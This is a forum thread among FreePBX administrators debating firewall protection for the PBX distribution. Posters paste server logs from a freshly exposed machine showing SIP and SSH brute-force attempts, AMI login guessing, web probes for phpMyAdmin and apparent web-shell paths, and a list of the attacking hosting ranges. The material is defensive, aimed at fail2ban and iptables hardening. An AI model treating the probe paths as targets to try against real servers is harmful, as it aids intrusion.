A challenge to all FreePBX based Distros

As i said above…
This is not saying it cant be easily installed we just cannot distribute it as this would violate their terms and licensing.

Contrary to what others may tell you peoples copyrights and other rights do matter

Thank you James, Exactly!! But please actually read their license, there is no mention of copyright anywhere apart from that it remains with the author.

It takes 5 minutes to install, maybe a little longer to actually RTFM :slight_smile:

Any bootable linux machine without a fully functional firewall immediately in place is as effective as a fish without a lasso to catch those dudes.

I understand you guys have your hands self tied, maybe you guys then just need to support/endorse an opensource firewall that can be deployed outside your closed system without compromise to your licenses, (obviously not endorsing any end-users abuse of such licenses) which would fill the obvious gap in your distro.

You shall not:

	3.1.1	modify, adapt, merge, translate, decompile, 
	disassemble, or reverse engineer the Product, except as 
	permitted by law; or

	3.1.2	sell, assign, rent, sub-license, loan, mortgage, 
	charge or otherwise deal in any way in the Product or 
	Documentation or any interest in them except as expressly 
	provided in this Licence.

The need for per-machine firewall is subjective.

-#1 If you run a hosted PBX explicitly accepting traffic from 0/0 with all (needed) ports exposed to The 'Net, you need one, no doubt 'bout that. But then you’re probably a weathered admin who knows what you are doing.

-#2 If you run an in-house private voip intranet, meaning you have an Internet Gateway with Firewall already, above the PBX, with rules to allow only to/from the trunk providers’ IPs, i’d say, it’s probably debatable whether you need more than fail2ban on the PBX itself, as your Internet Gateway already does firewalling for you. My Fail2Ban runs like that since deployment, have not seen an IP from the wild outside banned yet.

-#3 Do you need one, if you, say, allow your ‘roadrunners’ to the private voip intranet in case #2, through a dedicated tunnel(s) ? That is, you already punched a hole through the Gateway Firewall to let traffic into the TUNnel server… Do you need more firewalls ? Possibly, but not the same kind as case #1.

-#4 variations of the kind ‘i have public ipv6/ipv4 voip-only (and also not-voip-exclusive, hey people have softphones on their PCs) subnet in my house’ network are also possible.

So a guidance into each case would probably be welcome, but I can’t see how any ‘standard’ firewall can cater for all of that at the same time.

Well said. Really if you are using cookie cutter security you have already lost the war. Here is the thing about “packaging security” the bad guys have the package and know your battle plan. People should be vigilant and manage their security as appropriate for their situation. Some folks should probably hire someone to do this for them. The best route for these things is to give guides, tutorials and howto’s If you are an expert in a certain subject matter feel free to write a guide. I don’t know if users can, but I know admins can make a post like a wiki so it can be collaborative.

Remember all security measures should be considered YMMV. What works for one may not be ideal for another. Janice’s Bakery and tire shop doesn’t need the same security footprint as the pentagon.

These are the IP addresses (good and possibly bad) that go though your current implementation of iptables, and surely ANY use of iptables counts as a “firewall” even fail2ban.

grep -orE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' /var/log/*|grep -vE "0.0.0.0|127.0.0.1|Binary|$(wget -qO- http://ipecho.net/plain)"|sort -u 

There is nothing “cookie cutter” about iptables in general nor CSF specifically. You all have it working, It is up to you to build an effective set of rules. And I’m pretty sure that ALL “security measures” you might care to deploy will ultimately rely on your implementation of iptables.

I am suggesting that it would be good practice to make sure that all the issue of the above suggested command ONLY includes your “known hosts” or acceptable use of your mailserver/webserver/provisioning/etc.

My guess is that almost everyone will have something in that issue that would lead her to question security on that machine.

Without doubt the badguys already have the FreePBX “battleplan” and it’s not based on SIP alone :wink:

Yeah i suppose any FW rule builder ultimately compiles a set of iptables commands anyway ?

Computing security rule #1 : with computers on the 'net, you never know if you are paranoid enogh, or not yet…

Talking of “cookie-cutter” solutions, just for a grin I spun up a brand new copy of FreePBX stable (Asterisk 13) a couple of hours ago, It was on an as yet unused public IP address,I updated using Yum and then I rebooted. As of 18:49 PST the fail2ban regexes do not capture pjsip login fails .

[2015-06-10 18:48:25] NOTICE[4338] res_pjsip/pjsip_distributor.c: Request from '"2000" <sip:[email protected]>' failed for '62.210.211.233:5068' (callid: [email protected]) - No matching endpoint found

[2015-06-10 17:30:15] ‘107.150.43.162:5080’
[2015-06-10 17:45:47] ‘62.210.211.233:5081’
[2015-06-10 17:45:47] ‘62.210.211.233:5081’
[2015-06-10 17:45:48] ‘62.210.211.233:5081’
[2015-06-10 17:45:48] ‘62.210.211.233:5081’
[2015-06-10 17:45:48] ‘62.210.211.233:5081’
[2015-06-10 17:45:48] ‘62.210.211.233:5081’
[2015-06-10 17:46:05] ‘62.210.211.233:5067’
[2015-06-10 17:46:06] ‘62.210.211.233:5067’
[2015-06-10 17:46:06] ‘62.210.211.233:5067’
[2015-06-10 17:46:06] ‘62.210.211.233:5067’
[2015-06-10 17:46:06] ‘62.210.211.233:5067’
[2015-06-10 17:46:06] ‘62.210.211.233:5067’
[2015-06-10 17:49:32] ‘107.150.43.162:5070’
[2015-06-10 17:51:41] ‘62.210.211.233:5089’
[2015-06-10 17:51:41] ‘62.210.211.233:5089’
[2015-06-10 17:51:41] ‘62.210.211.233:5089’
[2015-06-10 17:51:42] ‘62.210.211.233:5089’
[2015-06-10 17:51:42] ‘62.210.211.233:5089’
[2015-06-10 17:51:42] ‘62.210.211.233:5089’
[2015-06-10 17:57:24] ‘199.19.109.121:5083’
[2015-06-10 18:00:26] ‘62.210.211.233:5070’
[2015-06-10 18:00:26] ‘62.210.211.233:5070’
[2015-06-10 18:00:27] ‘62.210.211.233:5070’
[2015-06-10 18:00:27] ‘62.210.211.233:5070’
[2015-06-10 18:00:27] ‘62.210.211.233:5070’
[2015-06-10 18:00:27] ‘62.210.211.233:5070’
[2015-06-10 18:03:45] ‘62.210.211.233:5061’
[2015-06-10 18:03:45] ‘62.210.211.233:5061’
[2015-06-10 18:03:45] ‘62.210.211.233:5061’
[2015-06-10 18:03:45] ‘62.210.211.233:5061’
[2015-06-10 18:03:46] ‘62.210.211.233:5061’
[2015-06-10 18:03:46] ‘62.210.211.233:5061’
[2015-06-10 18:08:14] ‘107.150.43.162:5076’
[2015-06-10 18:13:27] ‘5.152.222.50:5074’
[2015-06-10 18:15:59] ‘62.210.211.233:5092’
[2015-06-10 18:15:59] ‘62.210.211.233:5092’
[2015-06-10 18:16:00] ‘62.210.211.233:5092’
[2015-06-10 18:16:00] ‘62.210.211.233:5092’
[2015-06-10 18:16:00] ‘62.210.211.233:5092’
[2015-06-10 18:16:00] ‘62.210.211.233:5092’
[2015-06-10 18:16:12] ‘62.210.211.233:5085’
[2015-06-10 18:16:12] ‘62.210.211.233:5085’
[2015-06-10 18:16:12] ‘62.210.211.233:5085’
[2015-06-10 18:16:12] ‘62.210.211.233:5085’
[2015-06-10 18:16:13] ‘62.210.211.233:5085’
[2015-06-10 18:16:13] ‘62.210.211.233:5085’
[2015-06-10 18:17:37] ‘62.210.211.233:5064’
[2015-06-10 18:17:37] ‘62.210.211.233:5064’
[2015-06-10 18:17:37] ‘62.210.211.233:5064’
[2015-06-10 18:17:37] ‘62.210.211.233:5064’
[2015-06-10 18:17:37] ‘62.210.211.233:5064’
[2015-06-10 18:17:38] ‘62.210.211.233:5064’
[2015-06-10 18:17:42] ‘62.210.211.233:5078’
[2015-06-10 18:17:42] ‘62.210.211.233:5078’
[2015-06-10 18:17:43] ‘62.210.211.233:5078’
[2015-06-10 18:17:43] ‘62.210.211.233:5078’
[2015-06-10 18:17:43] ‘62.210.211.233:5078’
[2015-06-10 18:17:43] ‘62.210.211.233:5078’
[2015-06-10 18:20:45] ‘62.210.211.233:5081’
[2015-06-10 18:20:45] ‘62.210.211.233:5081’
[2015-06-10 18:20:46] ‘62.210.211.233:5081’
[2015-06-10 18:20:46] ‘62.210.211.233:5081’
[2015-06-10 18:20:46] ‘62.210.211.233:5081’
[2015-06-10 18:20:46] ‘62.210.211.233:5081’
[2015-06-10 18:21:18] ‘62.210.211.233:5069’
[2015-06-10 18:21:19] ‘62.210.211.233:5069’
[2015-06-10 18:21:19] ‘62.210.211.233:5069’
[2015-06-10 18:21:19] ‘62.210.211.233:5069’
[2015-06-10 18:21:19] ‘62.210.211.233:5069’
[2015-06-10 18:21:19] ‘62.210.211.233:5069’
[2015-06-10 18:25:08] ‘62.210.211.233:5076’
[2015-06-10 18:25:08] ‘62.210.211.233:5076’
[2015-06-10 18:25:08] ‘62.210.211.233:5076’
[2015-06-10 18:25:08] ‘62.210.211.233:5076’
[2015-06-10 18:25:08] ‘62.210.211.233:5076’
[2015-06-10 18:25:09] ‘62.210.211.233:5076’
[2015-06-10 18:27:01] ‘107.150.43.162:5070’
[2015-06-10 18:27:42] ‘62.210.211.233:5092’
[2015-06-10 18:27:42] ‘62.210.211.233:5092’
[2015-06-10 18:27:42] ‘62.210.211.233:5092’
[2015-06-10 18:27:42] ‘62.210.211.233:5092’
[2015-06-10 18:27:43] ‘62.210.211.233:5092’
[2015-06-10 18:27:43] ‘62.210.211.233:5092’
[2015-06-10 18:28:19] ‘62.210.211.233:5069’
[2015-06-10 18:28:19] ‘62.210.211.233:5069’
[2015-06-10 18:28:19] ‘62.210.211.233:5069’
[2015-06-10 18:28:19] ‘62.210.211.233:5069’
[2015-06-10 18:28:19] ‘62.210.211.233:5069’
[2015-06-10 18:28:19] ‘62.210.211.233:5069’
[2015-06-10 18:29:56] ‘62.210.211.233:5073’
[2015-06-10 18:29:56] ‘62.210.211.233:5073’
[2015-06-10 18:29:56] ‘62.210.211.233:5073’
[2015-06-10 18:29:56] ‘62.210.211.233:5073’
[2015-06-10 18:29:57] ‘62.210.211.233:5073’
[2015-06-10 18:29:57] ‘62.210.211.233:5073’
[2015-06-10 18:30:58] ‘62.210.211.233:5076’
[2015-06-10 18:30:58] ‘62.210.211.233:5076’
[2015-06-10 18:30:58] ‘62.210.211.233:5076’
[2015-06-10 18:30:58] ‘62.210.211.233:5076’
[2015-06-10 18:30:59] ‘62.210.211.233:5076’
[2015-06-10 18:30:59] ‘62.210.211.233:5076’
[2015-06-10 18:30:59] ‘62.210.211.233:5076’
[2015-06-10 18:35:15] ‘62.210.211.233:5062’
[2015-06-10 18:35:15] ‘62.210.211.233:5062’
[2015-06-10 18:35:15] ‘62.210.211.233:5062’
[2015-06-10 18:35:16] ‘62.210.211.233:5062’
[2015-06-10 18:35:16] ‘62.210.211.233:5062’
[2015-06-10 18:35:16] ‘62.210.211.233:5062’
[2015-06-10 18:36:57] ‘62.210.211.233:5073’
[2015-06-10 18:36:57] ‘62.210.211.233:5073’
[2015-06-10 18:36:57] ‘62.210.211.233:5073’
[2015-06-10 18:36:58] ‘62.210.211.233:5073’
[2015-06-10 18:36:58] ‘62.210.211.233:5073’
[2015-06-10 18:36:58] ‘62.210.211.233:5073’
[2015-06-10 18:40:56] ‘62.210.211.233:5070’
[2015-06-10 18:40:56] ‘62.210.211.233:5070’
[2015-06-10 18:40:56] ‘62.210.211.233:5070’
[2015-06-10 18:40:56] ‘62.210.211.233:5070’
[2015-06-10 18:40:56] ‘62.210.211.233:5070’
[2015-06-10 18:40:56] ‘62.210.211.233:5070’
[2015-06-10 18:44:00] ‘62.210.211.233:5093’
[2015-06-10 18:44:00] ‘62.210.211.233:5093’
[2015-06-10 18:44:00] ‘62.210.211.233:5093’
[2015-06-10 18:44:00] ‘62.210.211.233:5093’
[2015-06-10 18:44:01] ‘62.210.211.233:5093’
[2015-06-10 18:44:01] ‘62.210.211.233:5093’
[2015-06-10 18:46:10] ‘107.150.43.162:5078’
[2015-06-10 18:47:18] ‘62.210.211.233:5066’
[2015-06-10 18:47:18] ‘62.210.211.233:5066’
[2015-06-10 18:47:18] ‘62.210.211.233:5066’
[2015-06-10 18:47:18] ‘62.210.211.233:5066’
[2015-06-10 18:47:19] ‘62.210.211.233:5066’
[2015-06-10 18:47:19] ‘62.210.211.233:5066’
[2015-06-10 18:48:04] ‘62.210.211.233:5061’
[2015-06-10 18:48:04] ‘62.210.211.233:5061’
[2015-06-10 18:48:04] ‘62.210.211.233:5061’
[2015-06-10 18:48:04] ‘62.210.211.233:5061’
[2015-06-10 18:48:04] ‘62.210.211.233:5061’
[2015-06-10 18:48:05] ‘62.210.211.233:5061’
[2015-06-10 18:48:15] ‘62.210.211.233:5084’
[2015-06-10 18:48:15] ‘62.210.211.233:5084’
[2015-06-10 18:48:15] ‘62.210.211.233:5084’
[2015-06-10 18:48:15] ‘62.210.211.233:5084’
[2015-06-10 18:48:15] ‘62.210.211.233:5084’
[2015-06-10 18:48:15] ‘62.210.211.233:5084’
[2015-06-10 18:48:24] ‘62.210.211.233:5068’
[2015-06-10 18:48:25] ‘62.210.211.233:5068’
[2015-06-10 18:48:25] ‘62.210.211.233:5068’
[2015-06-10 18:48:25] ‘62.210.211.233:5068’
[2015-06-10 18:48:25] ‘62.210.211.233:5068’
[2015-06-10 18:48:25] ‘62.210.211.233:5068’
[2015-06-10 19:05:42] ‘107.150.43.162:5078’

As you can see an iptables without connection limiting,port flooding and port-scanning protection still leaves you exposed.

These are the particular “bad guys”

5.152.222.48/29 # RIPE GB RSDEDI-DJNIPIAM Dedicated Server Hosting
62.210.128.0/17 # RIPE FR IE-POOL-BUSINESS-HOSTING IP Pool for Iliad-Entreprises Business Hosting Customers
107.150.32.0/19 # ARIN US DSV4-8 DataShack, LC
199.19.104.0/21 # ARIN US VOLUMEDRIVE VolumeDrive

The same old guys . . . in only a couple of hours.

Interesting.
As you respun the system from scratch, I know it /might/ not be practical, but maybe some wireshark-like solution would tell you, whether the box is trying / or in fact sending / packets to IP’s not associated with the FreePBX project ? The dest addresses may NOT actually be the ones you’ve listed, i.e. maybe it’s just letting some ‘listeners’ know of its address, and then the ones you’ve listed are getting a hang of it and start flooding/querying?

(To expand a bit on that : long time ago there was /a/ program (maybe PINE, but not sure now) that, upon first start, asked for permission to send a SINGLE UDP PACKET to a pre-programmed destination (of course, shown to user), for statistical purposes… This was only done when user agreed though. Times have changed, methods of programming / gathering feedback have evolved… but techniques might have not exactly ?.. Just stabbing in the dark, hope this makes sense)

Not necessary, that is expected traffic to udp:5060 if you do not have a functional firewall. The same will be noticed on a forward facing open tcp:5038 as this instance has it:-

/var/log/asterisk/full:[2015-06-11 04:13:00] NOTICE[19995] 190.82.103.29 tried to authenticate with nonexistent user ‘test’
/var/log/asterisk/full:[2015-06-11 04:13:00] NOTICE[19995] 190.82.103.29 failed to authenticate as ‘test’
/var/log/asterisk/full:[2015-06-11 05:29:29] NOTICE[22065] 190.82.103.29 tried to authenticate with nonexistent user ‘panel’
/var/log/asterisk/full:[2015-06-11 05:29:29] NOTICE[22065] 190.82.103.29 failed to authenticate as ‘panel’
/var/log/asterisk/full:[2015-06-11 06:45:58] NOTICE[24085] 190.82.103.29 tried to authenticate with nonexistent user ‘munin’
/var/log/asterisk/full:[2015-06-11 06:45:58] NOTICE[24085] 190.82.103.29 failed to authenticate as ‘munin’
/var/log/asterisk/full:[2015-06-11 08:02:32] NOTICE[26116] 190.82.103.29 tried to authenticate with nonexistent user ‘outcall’
/var/log/asterisk/full:[2015-06-11 08:02:32] NOTICE[26116] 190.82.103.29 failed to authenticate as ‘outcall’
/var/log/asterisk/full:[2015-06-11 09:19:04] NOTICE[28084] 190.82.103.29 tried to authenticate with nonexistent user ‘hudpro’
/var/log/asterisk/full:[2015-06-11 09:19:04] NOTICE[28084] 190.82.103.29 failed to authenticate as ‘hudpro’
/var/log/asterisk/full-20150611:[2015-06-10 18:04:14] NOTICE[3136] Manager User ACL: Rejecting ‘190.82.103.29’ due to a failure to
/var/log/asterisk/full-20150611:[2015-06-10 18:04:14] NOTICE[3136] 190.82.103.29 failed to pass IP ACL as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-10 18:04:14] NOTICE[3136] 190.82.103.29 failed to authenticate as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-10 19:19:56] NOTICE[5251] 190.82.103.29 tried to authenticate with nonexistent user ‘phpagi’
/var/log/asterisk/full-20150611:[2015-06-10 19:19:56] NOTICE[5251] 190.82.103.29 failed to authenticate as ‘phpagi’
/var/log/asterisk/full-20150611:[2015-06-10 20:35:53] NOTICE[7307] Manager User ACL: Rejecting ‘190.82.103.29’ due to a failure to
/var/log/asterisk/full-20150611:[2015-06-10 20:35:53] NOTICE[7307] 190.82.103.29 failed to pass IP ACL as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-10 20:35:53] NOTICE[7307] 190.82.103.29 failed to authenticate as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-10 21:51:59] NOTICE[9319] 190.82.103.29 tried to authenticate with nonexistent user ‘cron’
/var/log/asterisk/full-20150611:[2015-06-10 21:51:59] NOTICE[9319] 190.82.103.29 failed to authenticate as ‘cron’
/var/log/asterisk/full-20150611:[2015-06-10 23:08:16] NOTICE[11496] Manager User ACL: Rejecting ‘190.82.103.29’ due to a failure to
/var/log/asterisk/full-20150611:[2015-06-10 23:08:16] NOTICE[11496] 190.82.103.29 failed to pass IP ACL as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-10 23:08:16] NOTICE[11496] 190.82.103.29 failed to authenticate as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-11 00:24:28] NOTICE[13545] Manager User ACL: Rejecting ‘190.82.103.29’ due to a failure to
/var/log/asterisk/full-20150611:[2015-06-11 00:24:28] NOTICE[13545] 190.82.103.29 failed to pass IP ACL as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-11 00:24:28] NOTICE[13545] 190.82.103.29 failed to authenticate as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-11 01:40:38] NOTICE[15589] Manager User ACL: Rejecting ‘190.82.103.29’ due to a failure to
/var/log/asterisk/full-20150611:[2015-06-11 01:40:38] NOTICE[15589] 190.82.103.29 failed to pass IP ACL as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-11 01:40:38] NOTICE[15589] 190.82.103.29 failed to authenticate as ‘admin’
/var/log/asterisk/full-20150611:[2015-06-11 02:56:48] NOTICE[17582] 190.82.103.29 tried to authenticate with nonexistent user ‘dialer’
/var/log/asterisk/full-20150611:[2015-06-11 02:56:48] NOTICE[17582] 190.82.103.29 failed to authenticate as ‘dialer’

I don’t mean to be a pain, but did you create a ticket about that? I was just randomly browsing through the forum, and I see a critical security issue, and no ticket?

No @xrobau I didn’t, you already have unresolved

http://issues.freepbx.org/browse/FREEPBX-9222

I started this thread hopefully to start a conversation about firewalls/adequate iptables rules for FreePBX per se , not to criticize any particular distro or implementation. I personally don’t use the distro.

I prefer gitting fail2ban from the horses mouth.

https://github.com/fail2ban/fail2ban/tarball/master

(May 25 2015)

And their asterisk jail catches that logline

It has a lot more jails and is faster with pynotify and all :wink: and again only IMHO lots of very pertinent jails like postfix apache-nohome, apache-noscript,apache-modsecurity,webmin jails, which are more appropriate for my systems.

1 Like

I love tickets! Let me go and hug it and squeeze it and call it George.

Edit: I’ve updated that ticket with the mention that there’s unpackaged commits. I’ll see if we can pull them into a custom build.

1 Like

For those who are following . .

Same machine /var/log/httpd/error.log now has

[Wed Jun 10 16:49:41 2015] [error] [client 185.25.151.159] script ‘/var/www/html/testproxy.php’ not found or unable to stat
[Wed Jun 10 16:51:07 2015] [error] [client 192.187.110.98] script ‘/var/www/html/testproxy.php’ not found or unable to stat
[Wed Jun 10 18:53:37 2015] [error] [client 31.3.226.2] File does not exist: /var/www/html/billing
[Wed Jun 10 19:08:02 2015] [error] [client 207.244.91.3] File does not exist: /var/www/html/vtigercrm
[Wed Jun 10 19:08:02 2015] [error] [client 207.244.91.3] client denied by server configuration: /var/www/html/admin/bootstrap.inc.php
[Wed Jun 10 19:36:18 2015] [error] [client 31.3.226.2] File does not exist: /var/www/html/a2b
[Wed Jun 10 22:22:57 2015] [error] [client 93.174.93.192] File does not exist: /var/www/html/payment
[Thu Jun 11 02:51:07 2015] [error] [client 222.205.106.165] File does not exist: /var/www/html/phpMyAdmin
[Thu Jun 11 02:51:10 2015] [error] [client 222.205.106.165] File does not exist: /var/www/html/pma
[Thu Jun 11 02:51:14 2015] [error] [client 222.205.106.165] File does not exist: /var/www/html/myadmin
[Thu Jun 11 06:29:23 2015] [error] [client 94.102.53.195] File does not exist: /var/www/html/html
[Thu Jun 11 06:46:07 2015] [error] [client 185.25.151.159] script ‘/var/www/html/testproxy.php’ not found or unable to stat
[Thu Jun 11 06:46:09 2015] [error] [client 185.49.15.23] script ‘/var/www/html/testproxy.php’ not found or unable to stat
[Thu Jun 11 10:02:36 2015] [error] [client 210.209.138.72] File does not exist: /var/www/html/phpMyAdmin
[Thu Jun 11 10:02:40 2015] [error] [client 210.209.138.72] File does not exist: /var/www/html/pma
[Thu Jun 11 10:02:43 2015] [error] [client 210.209.138.72] File does not exist: /var/www/html/myadmin
[Thu Jun 11 10:12:42 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:12:42 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:12:53 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:03 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:04 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:10 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:14 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:15 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:18 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:18 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:20 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:21 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:21 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:28 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:28 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:36 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:46 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager

These can be effectively eliminated with apache-noscript and apache-nohome jails.

Simple changing the ssh port from 22 will stop

Jun 10 13:58:44 localhost sshd[7831]: Invalid user ubnt from 190.12.31.42
Jun 10 13:58:48 localhost sshd[7833]: Invalid user admin from 190.12.31.42
Jun 10 14:55:47 localhost sshd[15217]: Invalid user ubnt from 183.57.41.101
Jun 10 18:17:54 localhost sshd[3510]: Invalid user ubnt from 58.67.159.31
Jun 10 21:22:28 localhost sshd[8553]: Invalid user a from 219.153.15.122
Jun 10 21:22:32 localhost sshd[8555]: Invalid user arun from 219.153.15.122
Jun 10 22:00:49 localhost sshd[9561]: Invalid user ubnt from 117.218.211.52
Jun 11 00:04:39 localhost sshd[13016]: Invalid user a from 221.226.106.188
Jun 11 02:32:46 localhost sshd[16946]: Invalid user sql from 91.200.12.73
Jun 11 02:32:49 localhost sshd[16948]: Invalid user sql from 91.200.12.73
Jun 11 03:33:24 localhost sshd[18547]: Invalid user server from 91.200.12.73
Jun 11 03:33:28 localhost sshd[18549]: Invalid user server from 91.200.12.73
Jun 11 04:11:13 localhost sshd[19925]: Invalid user admin from 91.200.12.73
Jun 11 04:11:16 localhost sshd[19927]: Invalid user admin from 91.200.12.73
Jun 11 04:36:05 localhost sshd[20606]: Invalid user ubnt from 202.85.213.203
Jun 11 06:09:04 localhost sshd[23066]: Invalid user xiuzuan from 27.17.18.141
Jun 11 12:23:53 localhost sshd[930]: Invalid user ubnt from 60.213.190.98
Jun 11 12:52:06 localhost sshd[1820]: Invalid user ubnt from 59.79.168.63
Jun 11 13:12:43 localhost sshd[2641]: Invalid user ubuntu from 60.5.185.18
Jun 11 13:12:47 localhost sshd[2643]: Invalid user ubuntu from 60.5.185.18
Jun 11 14:50:15 localhost sshd[4023]: Invalid user ubnt from 210.57.210.12

At least fail2ban catches those in general.

Hopefully you are seeing that adding prophylactic measure can only improve your current “security theater”

I meant rather,

To be plain & simple: while doing the config & stuff, before having trunks configured etc., the machine is NOT expected to receive any incoming SIP login requests, right?
In fact it is probably not expected to send any kind of requests to the 'net, to servers other than FreePBX owns (mirrors etc.) right?

But this is why it’s relevant to know WHEN do these login attempts actually start happening, in relation to box setup & config process. Or so I think :wink:

In other words : I find it very hard to believe, that, having e.g. installed & configured a system/distro from scratch, FreePBX or else, and ‘just’ by starting Asterisk to >listen< to the SIP traffic, and talk to a SIP trunk, that this kind of auth failures would just start ‘out of the blue’. Either something affiliated with the ‘invaders’ scans the ‘Internet’ for open port 5060, and then passes findings to the invaders, or something from inside the newly configured system calls home (it may even be a minute, harmless, totally unrelated ‘thing’, maybe just something hosted by the same company that owns the ‘invaders’ servers ? NTP ? Ajax ? PHP ? Just to name what comes to me head…)

I know it may sound like a crazy fairy tale :wink: but if /I/ can imagine this, how can I know anyone hasn’t imagined this before :slight_smile:

And of course I might also be completely wrong :wink:

No, as soon as chan-sip/chan-pjsip is loaded by asterisk then traffic on 5060/5061 will become apparent, this machine has no configuration above a login acount on the GUI.

It is not a matter of IF that traffic will appear, it’s just a matter of WHEN.

FWIW after a couple of days

104.255.67.233 		network = 104.255.64.0/21    # ARIN    US VOLUM-ARIN                               VolumeDrive
107.150.43.162 		network = 107.150.32.0/19    # ARIN    US DSV4-8                                   DataShack, LC
107.150.44.58 		network = 107.150.32.0/19    # ARIN    US DSV4-8                                   DataShack, LC
119.81.233.117 		network = 119.81.233.112/29  # APNIC   US NETBLK-SOFTLAYER-APNIC-CUST-HP702-AP     franko
173.242.125.166 		network = 173.242.112.0/20   # ARIN    US VOLUMEDRIVE                              VolumeDrive
188.138.102.49 		network = 188.138.0.0/17     # RIPE    DE DE-INTERGENIA-20090508                   PlusServer AG
192.99.67.24 		network = 192.99.0.0/16      # ARIN    CA OVH-ARIN-7                               OVH Hosting, Inc.
195.154.41.244 		network = 195.154.0.0/17     # RIPE    FR FR-ILIAD-ENTREPRISES-CUSTOMERS           Iliad Entreprises Customers
195.154.42.172 		network = 195.154.0.0/17     # RIPE    FR FR-ILIAD-ENTREPRISES-CUSTOMERS           Iliad Entreprises Customers
195.154.42.245 		network = 195.154.0.0/17     # RIPE    FR FR-ILIAD-ENTREPRISES-CUSTOMERS           Iliad Entreprises Customers
199.19.109.121 		network = 199.19.104.0/21    # ARIN    US VOLUMEDRIVE                              VolumeDrive
199.217.116.139 		network = 199.217.112.0/21   # ARIN    US HSI-6                                    Hosting Solutions International, Inc.
212.83.137.201 		network = 212.83.128.0/20    # RIPE    FR FRWOL                                    Tiscali France
212.83.154.176 		network = 212.83.154.0/23    # RIPE    FR FRWOL                                    Tiscali France
212.83.185.153 		network = 212.83.160.0/19    # RIPE    FR FRWOL                                    Iliad
31.3.252.226 		network = 31.3.252.224/29    # RIPE    GB RSDEDI-MCHEHHLN                          Dedicated Server Hosting
46.165.210.84 		network = 46.165.208.0/21    # RIPE    DE NETDIRECT-NET                            Leaseweb Germany GmbH (previously netdirekt e. K.)
5.152.222.50 		network = 5.152.222.48/29    # RIPE    GB RSDEDI-DJNIPIAM                          Dedicated Server Hosting
5.189.144.122 		network = 5.189.144.0/20     # RIPE    DE CONTABO                                  Contabo GmbH
5.189.144.123 		network = 5.189.144.0/20     # RIPE    DE CONTABO                                  Contabo GmbH
5.189.150.193 		network = 5.189.144.0/20     # RIPE    DE CONTABO                                  Contabo GmbH
5.189.190.186 		network = 5.189.176.0/20     # RIPE    DE CONTABO                                  Contabo GmbH
62.210.211.233 		network = 62.210.128.0/17    # RIPE    FR IE-POOL-BUSINESS-HOSTING                 IP Pool for Iliad-Entreprises Business Hosting Customers
62.210.95.30 		network = 62.210.0.0/17      # RIPE    FR IE-POOL-BUSINESS-HOSTING                 IP Pool for Iliad-Entreprises Business Hosting Customers
68.112.84.99 		network = 68.112.84.0/24     # ARIN    US VERM-CBN-68-112-84-0                     Vermont Law School
69.197.179.34 		network = 69.197.128.0/18    # ARIN    US WHOLESALEINTERNET-2                      WholeSale Internet, Inc.
69.64.59.127 		network = 69.64.32.0/19      # ARIN    US HSI-1                                    Hosting Solutions International, Inc.
82.205.21.193 		network = 82.205.16.0/20     # RIPE    PS BSA-BLOCK1-HM-EXPN                       BSA Block
85.25.93.91 		network = 85.25.93.64/26     # RIPE    DE AKTUELLINNRW-NET                         Aktuell in NRWhttp

Notice the developing pattern of clustered attackers, this is not coincidental.

Here is a demonstration of a an attack from

host 5.196.91.180 in network 5.196.0.0/16       # RIPE    FR FR-OVH-20120823                          OVH SAS


[root@localhost ~]# cat /var/log/httpd/error_log |grep 5.196.91.180
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/saky.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/k4ijo.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/alex.php' not found or unable to stat
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
